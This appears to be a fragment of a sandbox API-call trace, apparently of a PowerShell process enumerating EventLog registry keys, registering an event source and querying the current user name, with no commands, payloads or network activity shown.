	[0487.617] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x2, lpName=0x3b9bb0, lpcchName=0x22d688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x22d688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0487.617] CoTaskMemFree (pv=0x3b9bb0) 
	[0487.617] CoTaskMemFree (pv=0x0) 
	[0487.617] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0487.617] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x3, lpName=0x3b9bb0, lpcchName=0x22d688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x22d688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0487.617] CoTaskMemFree (pv=0x3b9bb0) 
	[0487.617] CoTaskMemFree (pv=0x0) 
	[0487.617] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0487.618] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x4, lpName=0x3b9bb0, lpcchName=0x22d688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x22d688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0487.618] CoTaskMemFree (pv=0x3b9bb0) 
	[0487.618] CoTaskMemFree (pv=0x0) 
	[0487.618] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0487.618] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x5, lpName=0x3b9bb0, lpcchName=0x22d688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x22d688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0487.618] CoTaskMemFree (pv=0x3b9bb0) 
	[0487.618] CoTaskMemFree (pv=0x0) 
	[0487.618] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0487.618] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x6, lpName=0x3b9bb0, lpcchName=0x22d688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x22d688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0487.618] CoTaskMemFree (pv=0x3b9bb0) 
	[0487.618] CoTaskMemFree (pv=0x0) 
	[0487.618] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0487.618] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x7, lpName=0x3b9bb0, lpcchName=0x22d688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x22d688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0487.618] CoTaskMemFree (pv=0x3b9bb0) 
	[0487.618] CoTaskMemFree (pv=0x0) 
	[0487.618] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0487.618] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x8, lpName=0x3b9bb0, lpcchName=0x22d688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x22d688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0487.618] CoTaskMemFree (pv=0x3b9bb0) 
	[0487.618] CoTaskMemFree (pv=0x0) 
	[0487.619] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x344) returned 0x0
	[0487.619] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x0) returned 0x2
	[0487.619] RegOpenKeyExW (in: hKey=0x340, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x348) returned 0x0
	[0487.619] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x0) returned 0x2
	[0487.619] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x34c) returned 0x0
	[0487.619] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x0) returned 0x2
	[0487.619] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x350) returned 0x0
	[0487.619] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x0) returned 0x2
	[0487.619] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x330) returned 0x0
	[0487.620] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x0) returned 0x2
	[0487.620] RegOpenKeyExW (in: hKey=0x340, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x2ec) returned 0x0
	[0487.620] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x0) returned 0x2
	[0487.620] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x1d8) returned 0x0
	[0487.620] RegOpenKeyExW (in: hKey=0x1d8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x0) returned 0x2
	[0487.620] RegOpenKeyExW (in: hKey=0x340, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x338) returned 0x0
	[0487.620] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x0) returned 0x2
	[0487.620] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x33c) returned 0x0
	[0487.620] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x35c) returned 0x0
	[0487.621] RegCloseKey (hKey=0x35c) returned 0x0
	[0487.621] RegCloseKey (hKey=0x340) returned 0x0
	[0487.621] RegCloseKey (hKey=0x33c) returned 0x0
	[0487.622] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d688 | out: phkResult=0x22d688*=0x33c) returned 0x0
	[0487.622] RegQueryInfoKeyW (in: hKey=0x33c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x22d5fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d5f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x22d5fc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d5f8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0487.622] CoTaskMemFree (pv=0x0) 
	[0487.622] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0487.622] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x0, lpName=0x3b9bb0, lpcchName=0x22d688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x22d688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0487.623] CoTaskMemFree (pv=0x3b9bb0) 
	[0487.623] CoTaskMemFree (pv=0x0) 
	[0487.623] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0487.623] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x1, lpName=0x3b9bb0, lpcchName=0x22d688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x22d688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0487.623] CoTaskMemFree (pv=0x3b9bb0) 
	[0487.623] CoTaskMemFree (pv=0x0) 
	[0487.623] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0487.623] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x2, lpName=0x3b9bb0, lpcchName=0x22d688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x22d688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0487.623] CoTaskMemFree (pv=0x3b9bb0) 
	[0487.623] CoTaskMemFree (pv=0x0) 
	[0487.623] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0487.623] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x3, lpName=0x3b9bb0, lpcchName=0x22d688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x22d688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0487.623] CoTaskMemFree (pv=0x3b9bb0) 
	[0487.623] CoTaskMemFree (pv=0x0) 
	[0487.623] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0487.623] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x4, lpName=0x3b9bb0, lpcchName=0x22d688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x22d688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0487.624] CoTaskMemFree (pv=0x3b9bb0) 
	[0487.624] CoTaskMemFree (pv=0x0) 
	[0487.624] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0487.624] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x5, lpName=0x3b9bb0, lpcchName=0x22d688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x22d688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0487.624] CoTaskMemFree (pv=0x3b9bb0) 
	[0487.624] CoTaskMemFree (pv=0x0) 
	[0487.624] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0487.624] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x6, lpName=0x3b9bb0, lpcchName=0x22d688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x22d688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0487.624] CoTaskMemFree (pv=0x3b9bb0) 
	[0487.624] CoTaskMemFree (pv=0x0) 
	[0487.624] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0487.624] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x7, lpName=0x3b9bb0, lpcchName=0x22d688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x22d688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0487.624] CoTaskMemFree (pv=0x3b9bb0) 
	[0487.624] CoTaskMemFree (pv=0x0) 
	[0487.624] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0487.624] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x8, lpName=0x3b9bb0, lpcchName=0x22d688, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x22d688, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0487.624] CoTaskMemFree (pv=0x3b9bb0) 
	[0487.625] CoTaskMemFree (pv=0x0) 
	[0487.625] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x340) returned 0x0
	[0487.625] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x0) returned 0x2
	[0487.625] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x35c) returned 0x0
	[0487.625] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x0) returned 0x2
	[0487.625] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x360) returned 0x0
	[0487.625] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x0) returned 0x2
	[0487.625] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x364) returned 0x0
	[0487.625] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x0) returned 0x2
	[0487.626] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x368) returned 0x0
	[0487.626] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x0) returned 0x2
	[0487.626] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x36c) returned 0x0
	[0487.626] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x0) returned 0x2
	[0487.626] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x370) returned 0x0
	[0487.626] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x0) returned 0x2
	[0487.626] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x374) returned 0x0
	[0487.626] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x0) returned 0x2
	[0487.626] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x378) returned 0x0
	[0487.626] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6e8 | out: phkResult=0x22d6e8*=0x37c) returned 0x0
	[0487.627] RegCloseKey (hKey=0x37c) returned 0x0
	[0487.627] RegCloseKey (hKey=0x33c) returned 0x0
	[0487.627] RegCloseKey (hKey=0x378) returned 0x0
	[0488.424] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d658 | out: phkResult=0x22d658*=0x378) returned 0x0
	[0488.424] RegQueryInfoKeyW (in: hKey=0x378, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x22d5cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d5c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x22d5cc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x22d5c8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.424] CoTaskMemFree (pv=0x0) 
	[0488.424] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0488.424] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x0, lpName=0x3b9bb0, lpcchName=0x22d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x22d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.424] CoTaskMemFree (pv=0x3b9bb0) 
	[0488.425] CoTaskMemFree (pv=0x0) 
	[0488.425] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0488.425] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x1, lpName=0x3b9bb0, lpcchName=0x22d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x22d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.425] CoTaskMemFree (pv=0x3b9bb0) 
	[0488.425] CoTaskMemFree (pv=0x0) 
	[0488.425] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0488.425] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x2, lpName=0x3b9bb0, lpcchName=0x22d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x22d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.425] CoTaskMemFree (pv=0x3b9bb0) 
	[0488.425] CoTaskMemFree (pv=0x0) 
	[0488.425] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0488.425] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x3, lpName=0x3b9bb0, lpcchName=0x22d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x22d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.425] CoTaskMemFree (pv=0x3b9bb0) 
	[0488.425] CoTaskMemFree (pv=0x0) 
	[0488.425] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0488.425] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x4, lpName=0x3b9bb0, lpcchName=0x22d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x22d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.425] CoTaskMemFree (pv=0x3b9bb0) 
	[0488.426] CoTaskMemFree (pv=0x0) 
	[0488.426] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0488.426] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x5, lpName=0x3b9bb0, lpcchName=0x22d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x22d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.426] CoTaskMemFree (pv=0x3b9bb0) 
	[0488.426] CoTaskMemFree (pv=0x0) 
	[0488.426] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0488.426] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x6, lpName=0x3b9bb0, lpcchName=0x22d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x22d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.426] CoTaskMemFree (pv=0x3b9bb0) 
	[0488.426] CoTaskMemFree (pv=0x0) 
	[0488.426] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0488.426] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x7, lpName=0x3b9bb0, lpcchName=0x22d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x22d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.426] CoTaskMemFree (pv=0x3b9bb0) 
	[0488.426] CoTaskMemFree (pv=0x0) 
	[0488.426] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0488.426] RegEnumKeyExW (in: hKey=0x378, dwIndex=0x8, lpName=0x3b9bb0, lpcchName=0x22d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x22d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0488.426] CoTaskMemFree (pv=0x3b9bb0) 
	[0488.426] CoTaskMemFree (pv=0x0) 
	[0488.427] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6b8 | out: phkResult=0x22d6b8*=0x33c) returned 0x0
	[0488.427] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6b8 | out: phkResult=0x22d6b8*=0x0) returned 0x2
	[0488.427] RegOpenKeyExW (in: hKey=0x378, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6b8 | out: phkResult=0x22d6b8*=0x37c) returned 0x0
	[0488.427] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6b8 | out: phkResult=0x22d6b8*=0x0) returned 0x2
	[0488.427] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6b8 | out: phkResult=0x22d6b8*=0x380) returned 0x0
	[0488.427] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6b8 | out: phkResult=0x22d6b8*=0x0) returned 0x2
	[0488.427] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6b8 | out: phkResult=0x22d6b8*=0x384) returned 0x0
	[0488.427] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6b8 | out: phkResult=0x22d6b8*=0x0) returned 0x2
	[0488.428] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6b8 | out: phkResult=0x22d6b8*=0x388) returned 0x0
	[0488.428] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6b8 | out: phkResult=0x22d6b8*=0x0) returned 0x2
	[0488.428] RegOpenKeyExW (in: hKey=0x378, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6b8 | out: phkResult=0x22d6b8*=0x38c) returned 0x0
	[0488.428] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6b8 | out: phkResult=0x22d6b8*=0x0) returned 0x2
	[0488.428] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6b8 | out: phkResult=0x22d6b8*=0x390) returned 0x0
	[0488.428] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6b8 | out: phkResult=0x22d6b8*=0x0) returned 0x2
	[0488.428] RegOpenKeyExW (in: hKey=0x378, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6b8 | out: phkResult=0x22d6b8*=0x394) returned 0x0
	[0488.428] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6b8 | out: phkResult=0x22d6b8*=0x0) returned 0x2
	[0488.428] RegOpenKeyExW (in: hKey=0x378, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6b8 | out: phkResult=0x22d6b8*=0x398) returned 0x0
	[0488.429] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22d6b8 | out: phkResult=0x22d6b8*=0x39c) returned 0x0
	[0488.429] RegCloseKey (hKey=0x39c) returned 0x0
	[0488.429] RegCloseKey (hKey=0x378) returned 0x0
	[0488.429] RegCloseKey (hKey=0x398) returned 0x0
	[0488.434] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b910008
	[0488.942] ReportEventW (hEventLog=0x1b910008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ca90c0*="WSMan", lpRawData=0x2ca8e30) returned 1
	[0488.944] CoTaskMemAlloc (cb=0x104) returned 0x1b39cff0
	[0488.944] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b39cff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0488.944] CoTaskMemFree (pv=0x1b39cff0) 
	[0488.945] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0488.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0488.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0488.947] CoTaskMemAlloc (cb=0x804) returned 0x1b3ab0b0
	[0488.947] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b3ab0b0, nSize=0x22d948 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x22d948) returned 0x1
	[0488.947] CoTaskMemFree (pv=0x1b3ab0b0) 
	[0488.947] CoTaskMemAlloc (cb=0x204) returned 0x3b9bb0
	[0488.947] GetUserNameW (in: lpBuffer=0x3b9bb0, pcbBuffer=0x22d988 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x22d988) returned 1
	[0488.948] CoTaskMemFree (pv=0x3b9bb0) 
